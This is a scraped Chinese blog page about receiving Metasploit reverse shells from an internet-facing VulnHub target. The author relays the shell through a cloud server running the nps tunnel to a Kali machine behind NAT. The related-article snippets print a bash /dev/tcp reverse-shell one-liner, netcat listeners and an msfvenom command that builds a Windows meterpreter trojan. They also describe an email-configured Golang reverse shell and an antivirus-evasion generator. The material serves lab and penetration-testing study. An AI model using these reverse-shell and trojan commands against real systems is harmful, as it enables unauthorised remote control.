云服务器+nps+msf反弹shell小技巧

最新推荐文章于 2023-07-03 22:44:22 发布
最新推荐文章于 2023-07-03 22:44:22 发布
阅读量1.4k 收藏 7
点赞数
分类专栏: vulnhub 反弹shell 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/113664881
版权

云服务器+nps+msf反弹shell小技巧

有时候我们在做实验或者真实环境测试的时候存在漏洞的服务器在外网,而我们的攻击机kali在内网,在需要msf接收shell的时候不知道该怎么接收,也接收不了(外网ip->内网ip,是不可能找得到的)。此时我们就需要一个云服务器(有外网IP的云主机)再安装一个nps(内网穿透的软件,github上面有,安装教程也在github上面,安装完毕后nps的目录在/etc/nps)。然后具体操作如下

环境:

云服务器:123.57.x.x:8086

靶机:64.69.43.237:10627(为vulnhub 的DC1,DC1我之间的文章有)

攻击机:192.168.x.128

云服务器

在云服务器安装好nps

nps配置

在这里插入图片描述
设置云服务器和kali的内网映射

msf1配置

在这里插入图片描述
目标为靶机,监听为云服务器的外网映射IP和端口

msf2配置

在这里插入图片描述
另起一个msf用于接收云服务器外网映射过来的shell,payload要一致,先run msf2再run msf1,成功从外网拿到shell

在这里插入图片描述

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NPS 1. 服务器端搭建
06-15
安装nps服务器必备文件,使用说明
shell 工具_黑客工具:大小仅30K,网络探测端口扫描shell反弹!速来补习
weixin_39952182的博客
12-05 117
前言小助手今天说的这个工具,是Linux下网络探测必备,在故障排查,远程连接中,简单方便,配上管道符操作,可以组装成强大的功能。他就是 Nmap 工具包内的 Ncat。介绍Netcat是用于跨TCP和UDP端口读写数据的实用程序。它可以用来做很多很酷的事情,比如文件传输,端口扫描,端口重定向,回溯别人的电脑,制作一个简单的聊天程序,用于网络故障排除等等,这就是为什么它被称为瑞士军刀。此外,现在几乎...
反弹shell
热门推荐
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell的原理和方法
linux下反弹shell的几种方法
Radiation's Blog
03-20 1万+
反弹的开始,我们需要使用nc在本地或者任意要反弹到的地方监听一个端口。最简单的做法是nc -l -p 8080,8080为要反弹的端口0x01—使用bashbash -i >& /dev/[tcp|udp]/10.1.1.19/8080 0>&1 注:该命令使用的是系统原生bash,[tcp|udp]是要使用的协议,一般选择tcp就行,10.1.1.19是你要反弹到的地址,如果要反弹到你的电脑上
反弹shell失败的几种原因
谢公子的博客
05-03 1万+
在实战中,我们经常会遇到各种各样奇怪的环境。 反弹shell失败的原因有很多: 反弹的命令不存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议 反弹的命令不存在或当前用户无权限调用bash 由于这种情况下只局限于Linux,所以不考虑Windows 反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash来反弹,所以 #bas...
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 8818
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
linux反弹shell
qq_52072846的博客
11-26 1772
linux反弹shell 在攻击主机上执行端口监听 nc -lvvp port 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6325
生成木马进行植入
公网ip反弹shel
m0_52432374的博客
04-30 406
关于内网穿透真实案例讲解
qq_36585338的博客
02-13 758
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 Kali 0x006内网穿透—数据转发 ​ GitHub - shellfeel/Ant-AntV: 一个经过实战考验的免杀程序生成器 MSF监听会话
Golang反弹shell(使用邮件获取反弹地址
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
Docker 使用NPS在服务器搭建内网穿透服务
01-11
使用NPS在服务器搭建内网穿透服务
基于NaYF4的光波导放大器:Er3 +,Yb3 + NPs-PMMA共价连接纳米复合材料
03-27
基于NaYF4的光波导放大器:Er3 +,Yb3 + NPs-PMMA共价连接纳米复合材料
NPS内网穿透工具,服务器端(CentOS)+客户端(CentOS、Windows)
最新发布
04-30
NPS内网穿透工具,服务器端(CentOS)+客户端(CentOS、Windows)。GitHub下载慢,特提供本下载地址
后端NPS
02-25
Comando CLI TypeORM实用程序严重的uma迁移: yarn typeorm migration:create -n {{name}}执行uma迁移无数据库: yarn typeorm migration:run回滚迁移(执行脱机): yarn typeorm migration:revert
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 876
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
内网渗透代理转发详解及工具介绍
博客地址 www.sec0nd.top
08-16 3344
在进行渗透测试时,getshell打点之后就要进行内网渗透了,那么为了更方便的进行横向移动,需要做代理转发。今天来了解下代理转发以及相关的工具。代理有两种形式,映射和转发,最终的表现形式均为代理端口映射:外网主机A想访问内网主机B上的服务端口转发:外网主机A已经可以访问内网主机B里的任意端口,但是无法访问内网主机C上的端口,此时可以将C主机的端口转发到主机B端口,那么外网主机A访问了内网主机B就等于访问了内网主机C。就简单介绍几种工具,都是比较常用的。......
云服务器在CentOS7中安装msf工具
剁椒鱼头没剁椒的博客
03-25 3130
在日常使用中,模拟攻击以及测试的时候都是直接使用本地虚拟机kali中的msf工具,但是在一些测试环境中需要使用到公网,但是目前的所有的云服务商,并不会提供kali镜像,那么当使用到msf工具的时候就需要自行安装了。网上的很多关于centos安装msf工具的教程,多多少少都存在一些问题,所以,这里就总结一篇关于centos7中安装msf工具的文章。一台云服务器centos 7.X版本Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
msf远控木马之部署在云服务器
m0_64987233的博客
07-03 229
msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe。// 登录postgresql数据库,首次登录没有密码。// 修改数据库用户postgres的密码。set LPORT 服务器监听端口。// 切换到postgres用户。// 安装postgresql。// 获取MSF安装脚本。// 设置payload。
基于802.1x+AD+NPS+DHCP动态下发VLAN配置 (
04-05
一、802.1x认证的原理 802.1x是一种认证协议,它定义了一种在局域网中对用户进行身份验证的标准方法。基本原理是在用户设备连接到网络时,先要进行身份验证,只有通过认证的用户才能访问网络资源。 具体实现方式是,用户设备连接到交换机后,首先会发送一个认证请求,请求接入认证服务器进行身份验证。交换机收到请求后,会将该请求转发给认证服务器,认证服务器再根据用户提供的用户名和密码等认证信息,判断用户是否能够通过认证。如果认证通过,则认证服务器会通知交换机将该用户设备接入到指定的VLAN中,从而实现对用户访问网络资源的控制。 二、AD和NPS的配置 AD(Active Directory)是一种由微软公司开发的目录服务,用于管理网络中的所有资源和用户。NPS(Network Policy Server)是一种基于Windows Server的认证服务器,可以用于实现802.1x认证,并对用户进行身份验证。下面是AD和NPS的配置步骤: 1、在AD中创建用户账户 首先需要在AD中创建用户账户,用于用户设备进行身份验证。具体步骤如下: ①打开“Active Directory用户和计算机”管理工具; ②右键单击“Users”文件夹,选择“New”→“User”,创建一个新用户; ③设置该用户的用户名和密码等信息,并确保该用户具备访问网络资源的权限。 2、在NPS中配置网络策略 接下来需要在NPS中配置网络策略,用于对用户进行身份验证。具体步骤如下: ①打开“Network Policy Server”管理工具; ②右键单击“Policies”文件夹,选择“New”→“Network Policy”,创建一个新的网络策略; ③在“Network Policy Properties”对话框中,设置策略名称和条件,并配置认证方法和授权方式等参数; ④在“Constraints”选项卡中,可以设置限制条件,例如限制用户在特定时间段内才能访问网络资源; ⑤在“Settings”选项卡中,可以设置一些其他参数,例如可用的VLAN列表、IP地址等信息; ⑥在“Policy Enabled”选项中,勾选“Enable this network policy”选项,使该策略生效。 三、DHCP动态下发VLAN配置 在进行802.1x认证的同时,还可以通过DHCP动态下发VLAN配置信息,从而实现对用户访问网络资源的控制。具体实现方式是,当用户设备通过802.1x认证后,交换机会将其接入到指定的VLAN中,并向DHCP服务器发送请求,获取IP地址和VLAN配置信息。 下面是DHCP动态下发VLAN配置的配置步骤: 1、在DHCP服务器中创建VLAN范围 首先需要在DHCP服务器中创建VLAN范围,用于为接入不同VLAN的用户设备分配IP地址。具体步骤如下: ①打开“DHCP管理控制台”; ②右键单击“IPv4”文件夹,选择“New Scope”,创建一个新的VLAN范围; ③设置该范围的起始IP地址、子网掩码、租约时间和网关等信息; ④为该VLAN范围创建一个名称和描述,以便于管理和识别。 2、在交换机上配置DHCP Helper地址 接下来需要在交换机上配置DHCP Helper地址,用于将DHCP请求转发给DHCP服务器。具体步骤如下: ①打开交换机的CLI界面; ②输入“configure terminal”命令,进入配置模式; ③输入“interface vlan x”命令,进入指定的VLAN配置界面; ④输入“ip helper-address dhcp-server-ip”命令,将DHCP Helper地址配置为DHCP服务器的IP地址; ⑤重复以上步骤,为每个需要进行DHCP动态下发VLAN配置的VLAN配置DHCP Helper地址。 3、在DHCP服务器中配置VLAN信息 最后需要在DHCP服务器中配置VLAN信息,用于为接入不同VLAN的用户设备动态下发VLAN配置。具体步骤如下: ①打开“DHCP管理控制台”; ②右键单击“IPv4”文件夹,选择“Server Options”→“Configure Options”,打开“Server Options”对话框; ③在“Server Options”对话框中,选择“066 Boot Server Host Name”和“067 Bootfile Name”选项,分别设置DHCP服务器的名称和文件路径,以便于DHCP服务器能够识别VLAN信息; ④在“Scope Options”对话框中,选择“New Option”,创建一个新的选项; ⑤在“New Option”对话框中,设置选项的名称、代码和数据类型等信息; ⑥在“Value”字段中,输入VLAN配置信息,例如“VLAN ID=10”等信息。 四、总结 基于802.1x AD NPS DHCP动态下发VLAN配置的实现方法,可以有效地控制用户对网络资源的访问权限,从而提高网络安全性和管理效率。但是,该方法需要对AD、NPS和DHCP等多个系统进行配置,需要一定的技术水平和经验,因此在实施时需要慎重考虑。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值